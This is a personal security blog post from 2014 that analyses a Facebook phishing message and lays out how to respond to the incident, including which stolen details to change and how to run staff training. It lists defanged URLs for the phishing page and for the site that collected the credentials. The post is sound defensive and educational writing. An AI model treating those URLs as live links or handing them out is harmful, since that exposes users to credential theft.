Pages

Wednesday, August 13, 2014

Facebook Message Phishing Analysis Response



Someone got this Facebook phishing attempt the other day. Lets check it out, first I'll explain some tell tale signs that make this a phish attempt, then I'll address the response. All I have is a screenshot to start with.


 message screenshot:














A good first check to see if something is malicious is to Google the message text in quotes, usually just the first ten words or so. Think of it as crowd sourcing the reputation of something and it works well with, a text message, an email message, or even the title of software. When the results are negative in the first few pages we can safely assume it is malicious. Below you will see some results and with all ten hits negative or describing some phishing and or scam.

 google-search: "your account has been reported by other users, and"



















One thing that makes this message suspicious is the odd characters for "Message Facebook" this is supposed to be the user who sent the message, so possibly an account was hacked or created, and they used different language characters for the user name to get past Facebook filters. Another possibility is someone is injecting messages by maybe a replay attack, but I haven't researched this.

 Assume the message is real and think about the language, "If you still want to use your account, please confirm your facebook account below." One, the lowercase "facebook" would most likely get fixed by editors. Two, the odd logic of the language is why would I need to confirm my account when it is either hacked by criminals, I'm violating the rules on purpose, or I accidentally violated the rules. Confirming my account does not help or change anything from Facebook's point of view. A conformation of an account should go through a predefined way of communication that only the user would have access to, like email or text message on a cell phone.

 Another tip off is the URL, which doesn't look like a Facebook domain.
hxxp://sadasdw[dot]ucoz[dot]org/Help_Confirm_Your_Facebook_Account[dot]user[dot]htm

 Checking whois we see the registrant is Compubyte Limited in the British Virgin Islands, just a provider of some sorts, so move on.

Another safe way to look at a site is to use the Wayback Machine which creates an image of the site like a historical reference. It's little use in this situation because you won't see source code, but I figured it would be good to mention. Checking the Wayback Machine gives us no results because of robots.txt, meaning the site asks web crawlers or bots not to index the site. 

Going to the site reveals an old credential harvester built on a few website providers and it reports to several other sites 
credentials = hxxp://rahmat02[dot]altervista[dot]org/gowa/
statistics  = hxxp://openstat[dot]net/ and hxxp://mc[dot]yandex[dot]ru/watch/
counter = hxxp://counter[dot]yadro[dot]ru/hit

To help you understand what a credential harvester looks like below are the screenshots of the entire process.









Entering info on the last pages redirects you to the real Facebook log in. 

This is an old harvester and probably auto generated. There are ways of creating much better harvesters that look almost exactly like the real Facebook. Now you are aware of what harvester can look like so you can avoid being duped.

_________________________________________________________________________________

Incident Response


Now you, your kids, or someone in your company has made a boo boo, they went to the site and filled out the all the questions. What do you do?

  1. Praise whoever reported the incident particularly whom ever fell for the phish.
  2. Make detailed notes of all information "lost," meaning we lost control of information where otherwise shouldn't have. Below is the list for this example.
    1. email address
    2. email password
    3. web mail client
    4. web mail password
    5. date of birth
    6. security question and answer
    7. country
    8. first and last name
    9. credit card number
    10. credit card type
    11. credit card expire date
    12. credit card security code
    13. billing address
    14. billing country
    15. facebook log in
    16. facebook password
  3. Now remove the items that are public, or can't be changed. Below are the items we will remove the list, why not respond, and some alternatives solutions that will better protect you.
    1. email address 
      1. Even if you go to great lengths to hide your personal or business email it is still public so migrating to a new email address is overkill.
    2. web mail client 
      1. What you use for a web mail client could open avenues for social engineering and vulnerability exploits, but hiding what you use will not stop the attack, instead focus on recognizing when the topic comes up over the phone, email and other communication where the speaker is not immediately identifiable. 
      2. Patch your software and proper monitoring will prevent vulnerability exploits.
    3. date of birth
      1. Your date of birth is public information with several databases keeping track, plus your mother cannot re-birth you so don't worry about it.
    4. country
      1. The country you are in is public information.
    5. first and last name
      1. Your name is public information nothing to do here
    6. billing address
      1. Your billing address is public information and moving is overkill, but you can keep an eye your credit report and bank accounts see Check Your Accounts 
    7. billing country
      1. The country you are in is public information, and moving to Timbuktu is a little crazy.
    8. facebook log in
      1. At the time of this blog you cannot change your Facebook log in, instead change your Facebook setting to use a different email publicly and only use a private email for log in purposes. 
  4. The above list is little to worry about, below are the major concerns for this situation, change or report stolen all of them.
    1. email password
    2. web mail password
    3. security question and answer
      1. Regarding the security question, this is a good example why I recommend lying for all your security questions and never reuse the same question, see How to Choose a Password.
    4. credit card number
    5. credit card type
    6. credit card  expire date
    7. credit card security code
    8. facebook password
  5. Now the incident is mitigated we now need to concentrate on the final step continuing education. Below are some suggestions on education in the enterprise atmosphere.
I like the idea of involving the person whom was phished because making the incident as personable as possible will motivate people to do the right thing, report incidents. The only situation I've seen do better is when the person whom usually gives the class is very entertaining.

Teach enough details to the person whom was phished to give a 10 minute class on the incident, and include some technical and personal advise. They will be nervous giving a class so the Security Engineer, Officer, or Analyst should be supportive at all times and act as a teaching lead to answer complicated questions and keep the class moving. Most of all keep it simple, generalize the situation (don't include security sensitive details), and record the class for future use.

In my experience people will remember and respond better to a fellow employee giving the class. If the same Security Engineer Officer, or Analyst is always giving the classes it can become a mundane task, which leads to blank stares.

To make it more personable relate the situation to home use for the company personal. When possible allow the employees to share the class video with families. The more you show people how it can affect them at home, the better.





____________________________________________________________________________

Thanks for reading my post. You can find me at any the links below. 

Posted by at
Labels: , , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)